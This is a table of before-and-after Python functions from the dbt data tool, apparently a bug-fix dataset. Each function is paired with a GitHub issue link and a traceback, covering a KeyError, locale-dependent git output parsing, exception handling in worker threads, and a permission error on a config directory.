| after_merge (string, 28–79.6k chars) | before_merge (string, 20–79.6k chars) | url (string, 38–71 chars) | full_traceback (string, 43–922k chars) | traceback_type (string, 555 classes) |
|---|---|---|---|---|
def show_table(self, result):
table = result.node.agate_table
rand_table = table.order_by(lambda x: random.random())
schema = result.node.schema
alias = result.node.alias
header = "Random sample of table: {}.{}".format(schema, alias)
logger.info("")
logger.info(header)
logger.info("-" * len(header))
rand_table.print_table(max_rows=10, max_columns=None)
logger.info("")
|
def show_table(self, result):
table = result.node["agate_table"]
rand_table = table.order_by(lambda x: random.random())
schema = result.node["schema"]
alias = result.node["alias"]
header = "Random sample of table: {}.{}".format(schema, alias)
logger.info("")
logger.info(header)
logger.info("-" * len(header))
rand_table.print_table(max_rows=10, max_columns=None)
logger.info("")
|
https://github.com/fishtown-analytics/dbt/issues/1288
|
2019-02-12 10:58:28,566 (MainThread): Sending event: {'category': 'dbt', 'action': 'invocation', 'label': 'end', 'context': [<snowplow_tracker.self_describing_json.SelfDescribingJson object at 0x10bcc7e48>, <snowplow_tracker.self_describing_json.SelfDescribingJson object at 0x108697518>, <snowplow_tracker.self_describing_json.SelfDescribingJson object at 0x10bca7358>]}
2019-02-12 10:58:29,028 (MainThread): Flushing usage events
2019-02-12 10:58:29,028 (MainThread): Encountered an error:
2019-02-12 10:58:29,029 (MainThread): 'agate_table'
2019-02-12 10:58:29,029 (MainThread): Traceback (most recent call last):
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/main.py", line 77, in main
results, succeeded = handle_and_check(args)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/main.py", line 151, in handle_and_check
task, res = run_from_args(parsed)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/main.py", line 207, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/main.py", line 215, in run_from_task
result = task.run()
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/task/seed.py", line 20, in run
self.show_tables(results)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/task/seed.py", line 42, in show_tables
self.show_table(result)
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/task/seed.py", line 26, in show_table
table = result.node['agate_table']
File "/usr/local/Cellar/dbt/0.12.2/libexec/lib/python3.7/site-packages/dbt/api/object.py", line 93, in __getitem__
return self._contents[key]
KeyError: 'agate_table'
|
KeyError
|
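The KeyError in the row above comes from mapping-style access: per `dbt/api/object.py` in the traceback, the node's `__getitem__` only serves keys present in its serialized contents, while `agate_table` is attached to the compiled node as a plain attribute, which is why the after_merge column switches to attribute access. A minimal sketch of that failure mode, using a simplified stand-in class (not the real APIObject):

```python
class APIObject:
    def __init__(self, **contents):
        self._contents = contents

    def __getitem__(self, key):
        # keyed access is limited to the serialized contents
        return self._contents[key]

node = APIObject(schema="analytics", alias="my_seed")
node.agate_table = "<agate.Table>"  # attached later, as an attribute

print(node.agate_table)    # attribute access works
print(node["schema"])      # keyed access works for serialized fields
try:
    node["agate_table"]    # the before_merge access pattern
except KeyError as e:
    print("KeyError:", e)  # KeyError: 'agate_table'
```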
def clone(repo, cwd, dirname=None, remove_git_dir=False):
clone_cmd = ["git", "clone", "--depth", "1", repo]
if dirname is not None:
clone_cmd.append(dirname)
result = run_cmd(cwd, clone_cmd, env={"LC_ALL": "C"})
if remove_git_dir:
rmdir(os.path.join(dirname, ".git"))
return result
|
def clone(repo, cwd, dirname=None, remove_git_dir=False):
clone_cmd = ["git", "clone", "--depth", "1", repo]
if dirname is not None:
clone_cmd.append(dirname)
result = run_cmd(cwd, clone_cmd)
if remove_git_dir:
rmdir(os.path.join(dirname, ".git"))
return result
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
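This row and the next several all apply the same fix: pin the locale to `C` so git's progress messages stay in English for the regexes that parse them. A minimal sketch of the pattern, assuming only the standard library (`run_git` is an illustrative name, not dbt's API):

```python
import os
import subprocess

def run_git(cwd, args, env=None):
    # Merge overrides into a copy of the parent environment; passing a
    # bare dict as env would *replace* the environment entirely, which
    # (as the run_cmd comment later in this table notes) breaks Windows.
    full_env = None
    if env is not None:
        full_env = os.environ.copy()
        full_env.update(env)
    return subprocess.run(
        ["git"] + args,
        cwd=cwd,
        env=full_env,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        check=True,
    )

# e.g. run_git(".", ["tag", "--list"], env={"LC_ALL": "C"})
```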
def list_tags(cwd):
out, err = run_cmd(cwd, ["git", "tag", "--list"], env={"LC_ALL": "C"})
tags = out.decode("utf-8").strip().split("\n")
return tags
|
def list_tags(cwd):
out, err = run_cmd(cwd, ["git", "tag", "--list"])
tags = out.decode("utf-8").strip().split("\n")
return tags
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def _checkout(cwd, repo, branch):
logger.debug(" Checking out branch {}.".format(branch))
run_cmd(cwd, ["git", "remote", "set-branches", "origin", branch])
run_cmd(cwd, ["git", "fetch", "--tags", "--depth", "1", "origin", branch])
tags = list_tags(cwd)
# Prefer tags to branches if one exists
if branch in tags:
spec = "tags/{}".format(branch)
else:
spec = "origin/{}".format(branch)
out, err = run_cmd(cwd, ["git", "reset", "--hard", spec], env={"LC_ALL": "C"})
return out, err
|
def _checkout(cwd, repo, branch):
logger.debug(" Checking out branch {}.".format(branch))
run_cmd(cwd, ["git", "remote", "set-branches", "origin", branch])
run_cmd(cwd, ["git", "fetch", "--tags", "--depth", "1", "origin", branch])
tags = list_tags(cwd)
# Prefer tags to branches if one exists
if branch in tags:
spec = "tags/{}".format(branch)
else:
spec = "origin/{}".format(branch)
out, err = run_cmd(cwd, ["git", "reset", "--hard", spec])
return out, err
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def get_current_sha(cwd):
out, err = run_cmd(cwd, ["git", "rev-parse", "HEAD"], env={"LC_ALL": "C"})
return out.decode("utf-8")
|
def get_current_sha(cwd):
out, err = run_cmd(cwd, ["git", "rev-parse", "HEAD"])
return out.decode("utf-8")
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def remove_remote(cwd):
return run_cmd(cwd, ["git", "remote", "rm", "origin"], env={"LC_ALL": "C"})
|
def remove_remote(cwd):
return run_cmd(cwd, ["git", "remote", "rm", "origin"])
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
def run_cmd(cwd, cmd, env=None):
logger.debug('Executing "{}"'.format(" ".join(cmd)))
if len(cmd) == 0:
raise dbt.exceptions.CommandError(cwd, cmd)
# the env argument replaces the environment entirely, which has exciting
# consequences on Windows! Do an update instead.
full_env = env
if env is not None:
full_env = os.environ.copy()
full_env.update(env)
try:
proc = subprocess.Popen(
cmd, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=full_env
)
out, err = proc.communicate()
except OSError as exc:
_interpret_oserror(exc, cwd, cmd)
logger.debug('STDOUT: "{}"'.format(out))
logger.debug('STDERR: "{}"'.format(err))
if proc.returncode != 0:
logger.debug("command return code={}".format(proc.returncode))
raise dbt.exceptions.CommandResultError(cwd, cmd, proc.returncode, out, err)
return out, err
|
def run_cmd(cwd, cmd):
logger.debug('Executing "{}"'.format(" ".join(cmd)))
if len(cmd) == 0:
raise dbt.exceptions.CommandError(cwd, cmd)
try:
proc = subprocess.Popen(
cmd, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
out, err = proc.communicate()
except OSError as exc:
_interpret_oserror(exc, cwd, cmd)
logger.debug('STDOUT: "{}"'.format(out))
logger.debug('STDERR: "{}"'.format(err))
if proc.returncode != 0:
logger.debug("command return code={}".format(proc.returncode))
raise dbt.exceptions.CommandResultError(cwd, cmd, proc.returncode, out, err)
return out, err
|
https://github.com/fishtown-analytics/dbt/issues/1222
|
analytics-core git:(master) 1M 2A ₹ LC_ALL=es_ES dbt deps
Encountered an error:
'NoneType' object has no attribute 'group'
Traceback (most recent call last):
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 126, in handle_and_check
task, res = run_from_args(parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 181, in run_from_args
results = run_from_task(task, cfg, parsed)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/main.py", line 189, in run_from_task
result = task.run()
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 439, in run
target_config = final_deps[name].fetch_metadata(self.config)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 83, in fetch_metadata
self._cached_metadata = self._fetch_metadata(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 239, in _fetch_metadata
path = self._checkout(project)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/task/deps.py", line 235, in _checkout
dirname=self._checkout_name)
File "/Users/vijay/.pyenv/versions/3.6.5/lib/python3.6/site-packages/dbt/clients/git.py", line 77, in clone_and_checkout
directory = matches.group(1)
AttributeError: 'NoneType' object has no attribute 'group'
|
AttributeError
|
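The shared traceback for these rows ends at `matches.group(1)` in `clone_and_checkout`, which parses the directory name out of git's clone message. An illustrative reconstruction of why that match comes back `None` under a Spanish locale (the exact regex and the translated message are approximations, not the code from git.py):

```python
import re

# git output under LC_ALL=C vs. an approximate es_ES translation
english = "Cloning into 'dbt-utils'...\n"
spanish = "Clonando en 'dbt-utils'...\n"

pattern = re.compile(r"Cloning into '(.+)'")

print(pattern.search(english).group(1))  # dbt-utils

matches = pattern.search(spanish)
print(matches)  # None: the regex never matches translated output
# matches.group(1) would then raise
# AttributeError: 'NoneType' object has no attribute 'group'
```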
def safe_run(self, manifest):
catchable_errors = (
dbt.exceptions.CompilationException,
dbt.exceptions.RuntimeException,
)
result = RunModelResult(self.node)
started = time.time()
try:
# if we fail here, we still have a compiled node to return
# this has the benefit of showing a build path for the errant model
compiled_node = self.compile(manifest)
result.node = compiled_node
# for ephemeral nodes, we only want to compile, not run
if not self.is_ephemeral_model(self.node):
result = self.run(compiled_node, manifest)
except catchable_errors as e:
if e.node is None:
e.node = result.node
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
except dbt.exceptions.InternalException as e:
build_path = self.node.build_path
prefix = "Internal error executing {}".format(build_path)
error = "{prefix}\n{error}\n\n{note}".format(
prefix=dbt.ui.printer.red(prefix),
error=str(e).strip(),
note=INTERNAL_ERROR_STRING,
)
logger.debug(error)
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
except Exception as e:
prefix = "Unhandled error while executing {filepath}".format(
filepath=self.node.build_path
)
error = "{prefix}\n{error}".format(
prefix=dbt.ui.printer.red(prefix), error=str(e).strip()
)
logger.error(error)
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
finally:
exc_str = self._safe_release_connection()
# if releasing failed and the result doesn't have an error yet, set
# an error
if exc_str is not None and result.error is None:
result.error = exc_str
result.status = "ERROR"
result.execution_time = time.time() - started
return result
|
def safe_run(self, manifest):
catchable_errors = (
dbt.exceptions.CompilationException,
dbt.exceptions.RuntimeException,
)
result = RunModelResult(self.node)
started = time.time()
exc_info = (None, None, None)
try:
# if we fail here, we still have a compiled node to return
# this has the benefit of showing a build path for the errant model
compiled_node = self.compile(manifest)
result.node = compiled_node
# for ephemeral nodes, we only want to compile, not run
if not self.is_ephemeral_model(self.node):
result = self.run(compiled_node, manifest)
except catchable_errors as e:
if e.node is None:
e.node = result.node
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
except dbt.exceptions.InternalException as e:
build_path = self.node.build_path
prefix = "Internal error executing {}".format(build_path)
error = "{prefix}\n{error}\n\n{note}".format(
prefix=dbt.ui.printer.red(prefix),
error=str(e).strip(),
note=INTERNAL_ERROR_STRING,
)
logger.debug(error)
result.error = dbt.compat.to_string(e)
result.status = "ERROR"
except Exception as e:
# set this here instead of finally, as python 2/3 exc_info()
# behavior with re-raised exceptions are slightly different
exc_info = sys.exc_info()
prefix = "Unhandled error while executing {filepath}".format(
filepath=self.node.build_path
)
error = "{prefix}\n{error}".format(
prefix=dbt.ui.printer.red(prefix), error=str(e).strip()
)
logger.error(error)
raise e
finally:
exc_str = self._safe_release_connection()
# if we had an unhandled exception, re-raise it
if exc_info and exc_info[1]:
six.reraise(*exc_info)
# if releasing failed and the result doesn't have an error yet, set
# an error
if exc_str is not None and result.error is None:
result.error = exc_str
result.status = "ERROR"
result.execution_time = time.time() - started
return result
|
https://github.com/fishtown-analytics/dbt/issues/1223
|
$ cat macros/oops_materialization.sql
{% materialization oops, default -%}
{{ exceptions.raise_dependency_error('x') }}
{%- endmaterialization %}
$ cat models/base.sql
{{ config(materialized='oops') }}
select 1 as id
$ cat models/dependent.sql
select * from {{ ref('base') }}
$ cat dbt_project.yml
name: 'debug'
version: '0.1.0'
profile: 'debug'
$ dbt run
Found 2 models, 0 tests, 0 archives, 0 analyses, 96 macros, 2 operations, 0 seed files
14:33:08 | Concurrency: 2 threads (target='default')
14:33:08 |
14:33:08 | 1 of 2 START oops model dbt_postgres.base............................ [RUN]
Exception in thread Thread-1:
Traceback (most recent call last):
File "/Users/jake/.pyenv/versions/3.6.5/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/Users/jake/.pyenv/versions/3.6.5/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/Users/jake/.pyenv/versions/3.6.5/lib/python3.6/multiprocessing/pool.py", line 119, in worker
result = (True, func(*args, **kwds))
File "/Users/jake/src/fishtown/dbt/dbt/runner.py", line 80, in call_runner
result = runner.safe_run(self.manifest)
File "/Users/jake/src/fishtown/dbt/dbt/node_runners.py", line 90, in safe_run
result = self.run(compiled_node, manifest)
File "/Users/jake/src/fishtown/dbt/dbt/node_runners.py", line 159, in run
return self.execute(compiled_node, manifest)
File "/Users/jake/src/fishtown/dbt/dbt/node_runners.py", line 456, in execute
materialization_macro.generator(context)()
File "/Users/jake/src/fishtown/dbt/dbt/clients/jinja.py", line 102, in call
return macro(*args, **kwargs)
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/runtime.py", line 575, in __call__
return self._invoke(arguments, autoescape)
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/asyncsupport.py", line 110, in _invoke
return original_invoke(self, arguments, autoescape)
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/runtime.py", line 579, in _invoke
rv = self._func(*arguments)
File "dbt-a42f706d92e89d13921e04ab", line 16, in macro
to_string(environment.call(context, environment.getattr((undefined(name='exceptions') if l_1_exceptions is missing else l_1_exceptions), 'raise_dependency_error'), 'x')),
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/sandbox.py", line 427, in call
return __context.call(__obj, *args, **kwargs)
File "/Users/jake/.pyenv/versions/3.6.5/envs/dbt36old/lib/python3.6/site-packages/jinja2/runtime.py", line 262, in call
return __obj(*args, **kwargs)
File "/Users/jake/src/fishtown/dbt/dbt/exceptions.py", line 218, in raise_dependency_error
raise DependencyException(msg)
dbt.exceptions.DependencyException: x
^C
Exited because of keyboard interrupt.
Done. PASS=0 ERROR=0 SKIP=0 TOTAL=0
ctrl-c
|
dbt.exceptions.DependencyException
|
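The before_merge column re-raises unhandled exceptions out of `safe_run` (via the stashed `exc_info` and `six.reraise`), which is what kills the worker thread in the traceback above; the after_merge column records the error on the result and returns. A minimal sketch of that record-instead-of-raise pattern in a thread pool (a simplified stand-in, not dbt's runner):

```python
import time
import traceback
from multiprocessing.dummy import Pool  # thread-backed pool

class RunResult:
    def __init__(self, name):
        self.name = name
        self.error = None
        self.status = "PASS"
        self.execution_time = 0.0

def safe_call(name, func):
    result = RunResult(name)
    started = time.time()
    try:
        func()
    except Exception:
        # Record the failure instead of re-raising, so the pool thread
        # survives and the caller still gets a result to report.
        result.error = traceback.format_exc()
        result.status = "ERROR"
    finally:
        result.execution_time = time.time() - started
    return result

def boom():
    raise RuntimeError("x")

with Pool(2) as pool:
    results = pool.starmap(safe_call, [("base", boom), ("ok", time.time)])
for r in results:
    print(r.name, r.status)  # base ERROR / ok PASS
```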
def __init__(self, profile_name, target_name, config, threads, credentials):
self.profile_name = profile_name
self.target_name = target_name
if isinstance(config, dict):
config = UserConfig.from_dict(config)
self.config = config
self.threads = threads
self.credentials = credentials
|
def __init__(
self,
profile_name,
target_name,
send_anonymous_usage_stats,
use_colors,
threads,
credentials,
):
self.profile_name = profile_name
self.target_name = target_name
self.send_anonymous_usage_stats = send_anonymous_usage_stats
self.use_colors = use_colors
self.threads = threads
self.credentials = credentials
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def to_profile_info(self, serialize_credentials=False):
"""Unlike to_project_config, this dict is not a mirror of any existing
on-disk data structure. It's used when creating a new profile from an
existing one.
:param serialize_credentials bool: If True, serialize the credentials.
Otherwise, the Credentials object will be copied.
:returns dict: The serialized profile.
"""
result = {
"profile_name": self.profile_name,
"target_name": self.target_name,
"config": self.config.to_dict(),
"threads": self.threads,
"credentials": self.credentials.incorporate(),
}
if serialize_credentials:
result["credentials"] = result["credentials"].serialize()
return result
|
def to_profile_info(self, serialize_credentials=False):
"""Unlike to_project_config, this dict is not a mirror of any existing
on-disk data structure. It's used when creating a new profile from an
existing one.
:param serialize_credentials bool: If True, serialize the credentials.
Otherwise, the Credentials object will be copied.
:returns dict: The serialized profile.
"""
result = {
"profile_name": self.profile_name,
"target_name": self.target_name,
"send_anonymous_usage_stats": self.send_anonymous_usage_stats,
"use_colors": self.use_colors,
"threads": self.threads,
"credentials": self.credentials.incorporate(),
}
if serialize_credentials:
result["credentials"] = result["credentials"].serialize()
return result
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 120, in handle_and_check
dbt.tracking.initialize_tracking()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 275, in initialize_tracking
active_user.initialize()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 51, in initialize
cookie = self.get_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 71, in get_cookie
user = self.set_cookie()
File "/usr/local/lib/python3.7/site-packages/dbt/tracking.py", line 62, in set_cookie
dbt.clients.system.make_directory(cookie_dir)
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 85, in make_directory
raise e
File "/usr/local/lib/python3.7/site-packages/dbt/clients/system.py", line 79, in make_directory
os.makedirs(path)
File "/usr/local/lib/python3.7/os.py", line 221, in makedirs
mkdir(name, mode)
PermissionError: [Errno 13] Permission denied: '/.dbt'
|
PermissionError
|
def from_credentials(
cls, credentials, threads, profile_name, target_name, user_cfg=None
):
"""Create a profile from an existing set of Credentials and the
remaining information.
:param credentials Credentials: The credentials for this profile.
:param threads int: The number of threads to use for connections.
:param profile_name str: The profile name used for this profile.
:param target_name str: The target name used for this profile.
:param user_cfg Optional[dict]: The user-level config block from the
raw profiles, if specified.
:raises DbtProfileError: If the profile is invalid.
:returns Profile: The new Profile object.
"""
config = UserConfig.from_dict(user_cfg)
profile = cls(
profile_name=profile_name,
target_name=target_name,
config=config,
threads=threads,
credentials=credentials,
)
profile.validate()
return profile
|
def from_credentials(
cls, credentials, threads, profile_name, target_name, user_cfg=None
):
"""Create a profile from an existing set of Credentials and the
remaining information.
:param credentials Credentials: The credentials for this profile.
:param threads int: The number of threads to use for connections.
:param profile_name str: The profile name used for this profile.
:param target_name str: The target name used for this profile.
:param user_cfg Optional[dict]: The user-level config block from the
raw profiles, if specified.
:raises DbtProfileError: If the profile is invalid.
:returns Profile: The new Profile object.
"""
if user_cfg is None:
user_cfg = {}
send_anonymous_usage_stats = user_cfg.get(
"send_anonymous_usage_stats", DEFAULT_SEND_ANONYMOUS_USAGE_STATS
)
use_colors = user_cfg.get("use_colors", DEFAULT_USE_COLORS)
profile = cls(
profile_name=profile_name,
target_name=target_name,
send_anonymous_usage_stats=send_anonymous_usage_stats,
use_colors=use_colors,
threads=threads,
credentials=credentials,
)
profile.validate()
return profile
|
https://github.com/fishtown-analytics/dbt/issues/1180
|
[Errno 13] Permission denied: '/.dbt'
Traceback (most recent call last):
File "/usr/local/lib/python3.7/site-packages/dbt/main.py", line 76, in main
results, succeeded = handle_and_check(args)
